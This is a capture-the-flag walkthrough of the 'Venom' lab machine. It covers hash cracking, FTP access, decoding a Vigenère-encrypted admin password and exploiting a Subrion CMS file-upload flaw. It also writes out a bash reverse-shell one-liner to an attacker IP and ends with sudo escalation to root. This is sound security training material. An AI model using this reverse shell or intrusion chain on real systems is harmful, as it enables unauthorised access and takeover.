[+] VENOM
1. Information Gathering
![](https://blog.kakaocdn.net/dn/cjmDX6/btrWQJhNU2E/YGq4DQAMHMPt4p4lUd3tgk/img.png)
![](https://blog.kakaocdn.net/dn/A9S4s/btrWQHYBBc2/1cPGitlhRVabQhe7JWa3LK/img.png)
![](https://blog.kakaocdn.net/dn/FpC82/btrWTJ8lpot/eNpNTUl5Y63H6Qq7rvGGK0/img.png)
- enum4linux
![](https://blog.kakaocdn.net/dn/bwQ49e/btrWRcX5326/ItpZlp848xnRIJpL86BNiK/img.png)
nathan / hostinger
Searched everything and tried everything, but
nothing gained!
In cases like this:
- Check the page source
![](https://blog.kakaocdn.net/dn/b51Fzl/btrWQtsDv9Q/bvIv61UhxyUkSfsQWk4CtK/img.png)
: 5f2a66f947fa5690c26506f66bde5c23
- Identify the hash type
![](https://blog.kakaocdn.net/dn/drEXV0/btrWQK8Kx3b/b54ZAhw0hpkwnjD2FMiia1/img.png)
- Crack the hash
![](https://blog.kakaocdn.net/dn/OVinp/btrWU6PCUnd/xlLo9s5tDltUkRMks26mzk/img.png)
: hostinger
- FTP login
![](https://blog.kakaocdn.net/dn/p5atU/btrWQ5kwkZL/i4vqyoWYOlQPecC1HI77Z1/img.png)
![](https://blog.kakaocdn.net/dn/rws38/btrWRyNnwdU/4mRaKf1xDbgvvPExFohlA1/img.png)
: Got a hint, and uploads work too!
- Check the hint
![](https://blog.kakaocdn.net/dn/clfg0R/btrWQIiUp1n/yKftsapINWyKgRozRO4C31/img.png)
: Is hostinger the salt key?
: WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0=
: aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
: dora password
: venom.box
: L7f9l8@J#p%Ue+Q1234 - the admin password once decoded
> It seems dora is the admin and this user's password is stored encrypted
- First, /etc/hosts
![](https://blog.kakaocdn.net/dn/vVXf0/btrWRy7Crgy/NDHhLFCzP2HIPWTrRMhJuK/img.png)
- Connecting to it:
![](https://blog.kakaocdn.net/dn/udmOx/btrWRx8K3fd/ckYGv9UWO5AAWKhBXmQqXK/img.png)
![](https://blog.kakaocdn.net/dn/blS1l8/btrWU7nt20C/FcYSVAYb6hAQRdzbK3dwN1/img.png)
![](https://blog.kakaocdn.net/dn/bmggZg/btrWRWtyrDa/fa7Q14wItw1Rq42wY635T1/img.png)
2. Exploitation
- Decoding
![](https://blog.kakaocdn.net/dn/dvjg0g/btrWRkIrVMo/4QEcc5kV5I75ZDRKryaKpK/img.png)
Decoded, it reads:
* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* You need to follow the "hostinger" on 'standard vigenere cipher'
also https://cryptii.com/pipes/vigenere-cipher
- Decryption
![](https://blog.kakaocdn.net/dn/biS0MG/btrWVKeCaIu/7sQsDLmX3kLLIHS35rsoy1/img.png)
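The hint chain above (nested base64, then a standard Vigenère cipher keyed with hostinger) can be reproduced offline instead of pasting the values into web decoders. This is an added example, not part of the original write-up: the function names are my own, the strings are the ones quoted on this page, and it assumes the common Vigenère convention that non-letters pass through without consuming a key letter.

```python
import base64
import string

# Strings quoted in the write-up above.
HINT_CIPHER = "WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0="
HINT_URL = "aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI="
STORED_PASSWORD = "L7f9l8@J#p%Ue+Q1234"
KEY = "hostinger"


def peel_base64(text, max_layers=10):
    """Remove nested base64 layers; return (plaintext, layers_removed)."""
    layers = 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(text, validate=True).decode("ascii")
        except ValueError:  # binascii.Error and UnicodeDecodeError derive from it
            break
        if not decoded or not decoded.isprintable():
            break
        text, layers = decoded, layers + 1
    return text, layers


def vigenere_decrypt(ciphertext, key):
    """Standard Vigenere: shift letters only, keep case, and advance the key
    only on letters (assumed convention); other characters are unchanged."""
    if not (key.isascii() and key.isalpha()):
        raise ValueError("key must consist of ASCII letters")
    shifts = [ord(c) - ord("a") for c in key.lower()]
    out, used = [], 0
    for ch in ciphertext:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            shift = shifts[used % len(shifts)]
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            used += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    for blob in (HINT_CIPHER, HINT_URL):
        print(peel_base64(blob))
    print(vigenere_decrypt(STORED_PASSWORD, KEY))
```

Neither layer protects the stored admin password: base64 has no key at all, and the Vigenère key is a word already exposed elsewhere on the same host.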
- Login
![](https://blog.kakaocdn.net/dn/cGbdyJ/btrWUbXXsRU/LWnUMKXdWL2Q5KRJO8kpf1/img.png)
![](https://blog.kakaocdn.net/dn/laWVE/btrWQX7YLv2/moBAHIRgGdeYyShSAKqgHK/img.png)
I'm in!
- upload shell
https://vk9-sec.com/subrion-cms-4-2-1-arbitrary-file-upload-authenticated-2018-19422/
Upload following the guide
![](https://blog.kakaocdn.net/dn/5OPg4/btrWR8tT8lQ/9d4WxTWrsv9r2t1XFOJgQK/img.png)
- Open the link and run it:
![](https://blog.kakaocdn.net/dn/d77yL6/btrWQYMAaJQ/wcGMJVUQdVrqyvoqDrHVL1/img.png)
RCE works!
- Start a listener and connect back:
![](https://blog.kakaocdn.net/dn/bPPucv/btrWQJoCrlV/DRlHKhPrhUwUR8bUFHKP4K/img.png)
Foothold gained!
# I skipped the steps, but
in summary:
1) Create a bash shell script on Kali:
#!/bin/bash
bash -i >&/dev/tcp/192.168.10.105/443 0>&1
2) Start a Python web server on Kali,
download the file via the RCE, make it executable,
and run it!
![](https://blog.kakaocdn.net/dn/eeWyIg/btrWSvWMWzK/NfNlHfbQ7SEUrTlSq9KkFK/img.png)
Seeing that it landed directly in the upload path,
I probably could have uploaded a shell directly
instead of an RCE script!
3. Privilege Escalation
Up to the hostinger user!
![](https://blog.kakaocdn.net/dn/p4EPi/btrWRjQnvvK/PjB564SLl79al5n1lha4zK/img.png)
- Dig through .bash_history
![](https://blog.kakaocdn.net/dn/NhYMu/btrWRWtyrBd/R5kz9AS27ejIr1n95YwXF0/img.png)
: Follow the hint and try it.
- nathan?
![](https://blog.kakaocdn.net/dn/bdcmhY/btrWUGwM15x/s4ZpK16A3lmnwe5w91VIK1/img.png)
nathan!
- sudo -l?
![](https://blog.kakaocdn.net/dn/cx9m0v/btrWS2AcsGc/vFP5KkKcDa4pmhbuU1rckK/img.png)
Everything except /bin/su?
- After changing the root password:
![](https://blog.kakaocdn.net/dn/oE8mn/btrWRcqhe8T/sKrW9kxsS30kn3fLoSkDi1/img.png)
root!